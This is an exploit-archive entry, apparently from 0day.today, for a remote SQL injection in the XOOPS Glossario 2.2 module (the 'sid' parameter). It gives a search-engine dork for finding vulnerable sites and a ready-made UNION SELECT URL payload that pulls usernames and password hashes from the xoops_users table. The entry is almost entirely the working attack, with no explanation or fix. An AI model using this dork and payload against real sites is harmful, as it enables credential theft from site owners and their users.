id: 2715
date: 03/06/2008
title: XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===================================================================
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability
===================================================================



###############################################################
#
###########XOOPS module glossaires SQL Injection
#
################################################################
#
##DORK 1 : allinurl: "modules/glossaires"
#
################################################################
EXPLOIT :

modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme

################################################################



#  0day.today [2023-03-21]  #